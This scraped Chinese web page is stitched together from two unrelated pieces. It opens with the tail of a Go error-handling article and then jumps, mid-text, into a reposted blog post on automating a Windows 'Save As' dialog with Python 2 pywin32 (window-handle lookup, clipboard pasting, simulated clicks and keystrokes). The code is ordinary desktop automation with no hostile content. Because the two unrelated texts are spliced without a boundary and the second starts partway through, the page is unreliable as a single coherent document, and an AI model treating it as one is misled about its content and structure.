在这个例子中，我们定义了一个自定义错误类型MyError，它包含了一个消息和一个错误码。这样做的好处是可以根据不同的错误码采取不同的处理策略。 4. 错误信息的最佳实践 最后，我想分享一些我在日常开发中积累的经验，这些经验有助于写出更好的错误信息。 - 明确且具体：错误信息应该直接指出问题所在，避免模糊不清的描述。 - 用户友好的：对于最终用户可见的错误信息，尽量使用通俗易懂的语言。 - 提供解决方案：如果可能的话，给出一些基本的解决建议。 - 避免泄露敏感信息：在生成错误信息时，注意不要暴露敏感数据，如密码或密钥。 结语 错误信息是我们与程序之间的桥梁，它能帮助我们更好地理解问题所在，并找到解决问题的方法。在Go语言里，错误处理不仅仅是个技术活儿，它还代表着一种态度——就是要做出高质量的软件的那种执着精神。希望通过这篇文章，你能在未来的项目中更加重视错误信息的处理，从而写出更加健壮和可靠的代码。 --- 以上内容结合了理论与实践，旨在让你对Go语言中的错误处理有更深的理解。记住，好的错误信息就像是一位优秀的导游，它能带你穿越迷雾，找到正确的方向。

...win32gui.PostMessage(hwnd_save, win32con.WM_KEYDOWN, win32con.VK_RETURN, 0) win32gui.PostMessage(hwnd_save, win32con.WM_KEYUP, win32con.VK_RETURN, 0) 以上在不需要修改保存路径的情况下可以直接保存文件 --------------------------------------------------------------------------------------------------------------------------- 以下是未解决的问题 1.修改路径的问题（已解决），我猜想是通过两种方式，一是通过左边的树视图（SysTreeView32）来操作选择路径，二是通过在地址栏直接输入路径地址。其中第一种方法在网上没有查找到操作的方法，然后尝试第二种方法，找到路径地址输入框然后输入路径： 未点击地址栏时路径的窗口句柄是上图这样的 点击地址栏之后路径窗口句柄变成下图这样 a1 = win32gui.FindWindowEx(hwnd,None,"WorkerW",None) a2 = win32gui.FindWindowEx(a1,None,"ReBarWindow32",None) a3 = win32gui.FindWindowEx(a2,None,"Address Band Root",None) a4 = win32gui.FindWindowEx(a3,None,"msctls_progress32",None) a5 = win32gui.FindWindowEx(a4,None,"Breadcrumb Parent",None) hwnd_filepath1 = win32gui.FindWindowEx(a5,None,"ToolbarWindow32",None) print "-----hwnd_filepath1------",hwnd_filepath1 先找到到上图路径栏句柄（查找成功），然后按回车，使地址栏变成可输入状态 win32gui.PostMessage(hwnd_filepath1, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, 0) win32gui.PostMessage(hwnd_filepath1, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, 0) 在通过路径查找 a11 = win32gui.FindWindowEx(hwnd,None,"WorkerW",None) a21 = win32gui.FindWindowEx(a11,None,"ReBarWindow32",None) a31 = win32gui.FindWindowEx(a21,None,"Address Band Root",None) a41 = win32gui.FindWindowEx(a31,None,"msctls_progress32",None) a6 = win32gui.FindWindowEx(a41,None,"ComboBoxEx32",None) a7 = win32gui.FindWindowEx(a6,None,"ComboBox",None) hwnd_filepath = win32gui.FindWindowEx(a7,None,"Edit",None) print "-----hwnd_filepath------",hwnd_filepath 到这一步查找句柄返回值变成0，就是没查找到路径编辑框，没有找到原因，代码运行下来路径那里只是能看到的效果点击了一下，但是不会变成输入框状态，但是把鼠标移上去会变成输入的状态 这样是可输入的状态 然后win32gui.SendMessage(hwnd_filepath, win32con.WM_SETTEXT, None, 'C:\Users\Administrator\Desktop')这样地址就输入不进去，原因不明 视图数操作的方法没有找到 2.取消按钮的点击无效（已解决） 保存按钮 取消按钮 保存和取消的类名都是“Button”，所以通过保存按钮查找到下一个Button就是取消 hwnd_cancle = win32gui.FindWindowEx(hwnd,hwnd_save,"Button",None) print "------hwnd_cancle---",hwnd_cancle 取消句柄获取到了，通过下面的方法打印出来的父句柄和保存按钮是一样的都是另存为这个弹出框 print win32gui.GetParent(hwnd_cancle) 下面两行代码也获取到了取消的类名和标题打印出来的是‘Button’和‘取消’ print win32gui.GetClassName(hwnd_cancle) print win32gui.GetWindowText(hwnd_cancle).decode('gbk').encode('utf-8') 以下两行代码点击取消按钮的时候，弹出框不关闭，然后发现点击的是保存按钮，原因不明 win32gui.PostMessage(hwnd_cancle, win32con.WM_KEYDOWN, win32con.VK_RETURN, 0) win32gui.PostMessage(hwnd_cancle, win32con.WM_KEYUP, win32con.VK_RETURN, 0) 以上是完成的两点和处理失败的两点，做出来是个半成品，win32gui这方面的知识对我来说有点难，在python中安装的pywin32自带了一个API，里面的描述方法很简单，不够详细，很多看不太懂，以后还需要再花时间慢慢研究 -------------------------------------------------------------------------------------------- 问题1的解决方法： 修改成指定路径 win_1 = win32gui.FindWindowEx(hwnd, None,"WorkerW",None) win_2 = win32gui.FindWindowEx(win_1, None,"ReBarWindow32",None) win_3 = win32gui.FindWindowEx(win_2, None,"Address Band Root",None) win_4 = win32gui.FindWindowEx(win_3, None,"msctls_progress32",None) left, top, right, bottom = win32gui.GetWindowRect(win_4) win32api.SetCursorPos([left,top]) win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP | win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0) 将路径复制到剪切板 win32clipboard.OpenClipboard() win32clipboard.EmptyClipboard() win32clipboard.SetClipboardText(filePath) win32clipboard.CloseClipboard() 按下ctrl+v win32api.keybd_event(0x11, 0, 0, 0) win32api.keybd_event(0x56, 0, 0, 0) win32api.keybd_event(0x56, 0, win32con.KEYEVENTF_KEYUP, 0) win32api.keybd_event(0x11, 0, win32con.KEYEVENTF_KEYUP, 0) 按回车进入该路径 win32api.keybd_event(0x0D,0,0,0) 问题2取消按钮点击的问题已经解决： 点击取消按钮，用鼠标点击点击取消按钮，上面使用键盘按键不行，原因不明 hwnd_cancel = win32gui.FindWindowEx(hwnd,hwnd_save,"Button",None) left, top, right, bottom = win32gui.GetWindowRect(hwnd_cancel)该方法接收值必须为4个 win32api.SetCursorPos([left+35,top+13]) win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP | win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0) win32gui.GetWindowRect方法描述：Returns the rectangle for a window in screen coordinates。应该返回该句柄控件的四个顶点坐标吧 win32api.SetCursorPos方法描述：The SetCursorPos function moves the cursor to the specified screen coordinates.将光标移动到指定的屏幕坐标。 ----------------------------------------------------------------------------------------------- 查找另存为弹出框下的所有子句柄： hwndChildList = [] win32gui.EnumChildWindows(hwnd, lambda hwnd1, param: param.append(hwnd1), hwndChildList) for a in hwndChildList: print win32gui.GetParent(a) print win32gui.GetClassName(a) print win32gui.GetWindowText(a).decode('gbk').encode('utf-8') print "-----hwnd_save------",a 另外，经同事推荐ViewWizard工具比spy++更轻便快捷，查看父句柄也比之更方便 按键控制查询：http://www.mamicode.com/info-detail-1319197.html 本篇文章为转载内容。原文链接：https://blog.csdn.net/weixin_39814378/article/details/110329291。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。